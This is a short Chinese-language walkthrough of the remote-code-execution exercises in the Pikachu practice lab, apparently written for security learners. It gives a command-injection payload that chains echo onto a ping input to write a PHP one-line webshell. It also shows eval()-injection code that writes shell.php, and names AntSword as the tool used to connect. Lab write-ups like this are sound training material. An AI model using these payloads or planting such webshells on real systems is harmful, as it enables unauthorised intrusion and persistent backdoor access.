Pikachu靶场之RCE漏洞详解
一.exec "ping"
1.ping本机127.0.0.1
2.用&符拼接dir查看目录
3.&拼接echo输入一句话木马
127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php
4.同级目录访问6.php,蚁剑连接
二:exec "eval"
1.后台使用了eval()函数,直接输入phpinfo();
2.写入一句话木马,访问shell.php
fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');